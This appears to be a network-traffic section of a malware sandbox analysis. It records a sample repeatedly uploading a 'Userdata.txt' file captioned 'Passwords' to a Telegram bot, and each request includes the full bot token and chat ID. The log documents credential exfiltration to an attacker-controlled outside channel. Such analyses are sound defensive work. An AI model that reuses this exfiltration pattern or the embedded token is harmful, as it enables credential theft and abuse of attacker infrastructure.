                                                                                                                2025-01-10 21:44:30 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43653,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545470,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                36192.168.2.650055149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:32 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd347a37ca4cc1
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:32 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 37 61 33 37 63 61 34 63 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd347a37ca4cc1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:32 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:32 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:32 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43654,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545472,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                37192.168.2.650057149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:33 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd3498c045968a
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 39 38 63 30 34 35 39 36 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd3498c045968aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:33 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:33 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:33 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43655,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545473,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                38192.168.2.650059149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:35 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd34bc362efad8
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:35 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 62 63 33 36 32 65 66 61 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd34bc362efad8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:35 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:35 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:35 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43656,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545475,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                39192.168.2.650061149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:36 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd34e226fe6ed0
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:44:36 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 65 32 32 36 66 65 36 65 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd34e226fe6ed0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:36 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:36 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:36 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43657,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545476,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                40192.168.2.650063149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:38 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd350bc3e4dbe2
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:44:38 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 30 62 63 33 65 34 64 62 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd350bc3e4dbe2Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:38 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:38 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:38 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43658,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545478,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                41192.168.2.650065149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:39 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd3537da7c3adb
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:44:39 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 33 37 64 61 37 63 33 61 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd3537da7c3adbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:40 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:40 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:40 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43659,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545480,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                42192.168.2.650068149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:41 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd356145cdd8a1
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:44:41 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 36 31 34 35 63 64 64 38 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd356145cdd8a1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:41 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:41 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
